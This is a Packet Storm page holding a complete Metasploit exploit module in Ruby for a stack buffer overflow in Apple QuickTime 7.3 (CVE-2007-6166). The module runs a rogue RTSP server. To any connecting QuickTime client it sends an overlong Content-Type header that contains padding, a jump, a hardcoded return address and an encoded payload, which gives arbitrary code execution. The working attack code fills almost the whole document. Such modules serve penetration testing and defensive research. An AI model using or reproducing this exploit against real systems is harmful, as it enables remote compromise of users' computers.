Lucene search

K
packetstormMCPACKETSTORM:83037
HistoryNov 26, 2009 - 12:00 a.m.

Apple QuickTime 7.3 RTSP Response Header Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
17

0.972 High

EPSS

Percentile

99.8%

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::TcpServer  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Apple QuickTime 7.3 RTSP Response Header Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in Apple QuickTime 7.3. By sending an overly long  
RTSP response to a client, an attacker may be able to execute arbitrary code.  
},  
'Author' => 'MC',  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>   
[  
[ 'CVE', '2007-6166' ],  
[ 'OSVDB', '40876' ],  
[ 'BID', '26549' ],   
[ 'URL', 'http://milw0rm.com/exploits/4648' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 700,  
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",  
'MaxNops' => 0,  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'QuickTime 7.3, QuickTime Player 7.3', { 'Offset' => 991, 'Ret' => 0x67644297 } ], # pop esi; pop ebx; ret / QuickTimeStreaming.qtx (7.3.0.70)  
],  
'Privileged' => false,  
'DisclosureDate' => 'Nov 23 2007',  
'DefaultTarget' => 0))  
  
register_options(  
[   
OptPort.new('SRVPORT', [ true, "The RTSP daemon port to listen on", 554 ])  
], self.class)  
end  
  
def on_client_connect(client)  
return if ((p = regenerate_payload(client)) == nil)   
  
client.get_once  
  
buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2)   
buffer << [target.ret].pack('V') + payload.encoded + rand_text_english(4092 - payload.encoded.length)  
  
strname = rand_text_alpha(rand(75) + 1)  
date = Time.now  
num = rand(1).to_s  
  
header = "RTSP/1.0 200 OK\r\n"  
header << "CSeq: 1\r\n"  
header << "Date: #{date}\r\n"  
header << "Content-Base: rtsp://0.0.0.0/#{strname}\r\n"  
header << "Content-Type: #{buffer}\r\n"   
header << "Content-Length: #{strname.length}\r\n\r\n"  
  
body = "v=#{num}\r\n"  
body << "o=#{strname}\r\n"  
body << "s=#{strname}\r\n"  
body << "i=#{strname}\r\n"  
body << "t=#{num}\r\n"  
body << "a=tool:#{strname}\r\n"  
body << "a=type:#{strname}\r\n"  
body << "a=control:#{strname}\r\n"  
body << "a=range:#{strname}\r\n"  
body << "a=x-qt-text-nam:#{strname}\r\n"  
body << "a=x-qt-text-inf:#{strname}\r\n"  
body << "m=#{strname}\r\n"  
body << "c=#{strname}\r\n"  
body << "a=control:#{strname}\r\n"  
  
sploit = header + body  
  
print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")  
  
client.put(sploit)  
handler(client)  
  
service.close_client(client)  
end  
  
end  
`